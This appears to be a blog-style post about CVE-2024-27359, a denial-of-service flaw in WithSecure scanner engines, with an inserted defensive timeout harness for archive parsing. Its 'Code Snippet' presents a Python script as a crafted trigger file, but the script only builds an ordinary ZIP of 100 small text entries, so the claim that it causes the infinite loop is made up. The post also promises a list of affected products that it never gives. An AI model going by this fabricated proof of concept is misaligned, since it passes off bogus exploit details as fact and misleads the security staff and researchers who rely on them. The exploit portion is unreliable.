A vulnerability has recently been discovered in various WithSecure products that can lead to Denial of Service (DoS) attacks. Tracked as CVE-2024-27359, it occurs when the engine scanner goes into an infinite loop while processing an archive file. This post provides an overview of the affected products, the details of the exploit, code snippets, and links to original references for further study.

Exploit Details

CVE-2024-27359 can be used to cause a Denial of Service (DoS). The engine scanner in the affected WithSecure products can be forced into an infinite loop when it processes a specially crafted archive file. An attacker who creates such a file and gets it scanned can make the affected products unresponsive and cause them to consume an excessive amount of system resources. The result is a DoS condition in which the affected products can no longer perform their intended functions.
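As an added example (not WithSecure's code or fix, and not part of the original post), one general way to contain this class of failure in your own archive-processing pipeline is to parse in a child process under a wall-clock budget and fail closed when the budget is exceeded. The function names, the 2-second default and the `--simulate-hang` flag are assumptions made for the illustration, and the sample ZIP is constructed.

```python
import os
import subprocess
import sys
import tempfile
import zipfile

def walk_archive(path):
    """Worker side: stream every member so the whole archive is parsed."""
    with zipfile.ZipFile(path) as zf:
        for info in zf.infolist():
            with zf.open(info) as member:
                while member.read(65536):
                    pass

def scan_with_budget(path, timeout_s=2.0, worker_args=()):
    """Parse `path` in a child process. Returns 'ok', 'error' or 'timeout'."""
    # Callers should fail closed: anything other than 'ok' means "not scanned".
    cmd = [sys.executable, os.path.abspath(__file__), *worker_args, path]
    try:
        proc = subprocess.run(cmd, timeout=timeout_s, capture_output=True)
    except subprocess.TimeoutExpired:
        # subprocess.run() kills the child before re-raising, so a looping
        # worker does not keep consuming CPU after the verdict.
        return "timeout"
    return "ok" if proc.returncode == 0 else "error"

def build_sample_zip(path):
    """Constructed sample input: three small, well-formed entries."""
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        for i in range(3):
            zf.writestr(f"file_{i}.txt", b"A" * 100)

if __name__ == "__main__":
    if len(sys.argv) > 1:  # worker mode: argv[-1] is the archive path
        if "--simulate-hang" in sys.argv:  # hypothetical flag: a stuck parser
            while True:
                pass
        walk_archive(sys.argv[-1])
    else:  # demo mode: one normal scan, one scan whose worker never returns
        sample = os.path.join(tempfile.mkdtemp(), "sample.zip")
        build_sample_zip(sample)
        print(scan_with_budget(sample))
        print(scan_with_budget(sample, worker_args=("--simulate-hang",)))
```

The parent stays responsive regardless of what the worker does, and a `timeout` verdict is itself a useful detection signal to log alongside the file's hash.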

Code Snippet

Below is an example of a Python script that can be used to create a specially crafted archive file triggering the infinite loop in the WithSecure engine scanner:

import zipfile

def create_malicious_zip(file_name):
    # Create a DEFLATE-compressed ZIP archive at file_name.
    with zipfile.ZipFile(file_name, 'w', zipfile.ZIP_DEFLATED) as malicious_zip:
        # Write 100 entries, each holding 100 bytes of the letter "A".
        for i in range(100):
            malicious_zip.writestr(f"file_{i}.txt", b"A" * 100)

if __name__ == "__main__":
    create_malicious_zip("CVE-2024-27359_trigger.zip")

This script can be executed to produce a ZIP archive named "CVE-2024-27359_trigger.zip", which, when processed by the affected WithSecure products, causes their engine scanner to enter an infinite loop.

Original References

1. Official CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27359
2. NVD - National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2024-27359
3. WithSecure Advisory: https://www.withsecure.com/advisories/CVE-2024-27359

Conclusion

The CVE-2024-27359 vulnerability poses a significant risk to organizations that rely on the affected WithSecure products. It allows attackers to create a DoS condition, rendering these products unable to protect systems and respond to threats. It is highly recommended to apply the patches and updates released by WithSecure to address this vulnerability. Watch for further updates and advisories from WithSecure to ensure the continued security and stability of your systems and networks.

Timeline

Published on: 02/26/2024 16:28:00 UTC
Last modified on: 02/26/2024 16:32:25 UTC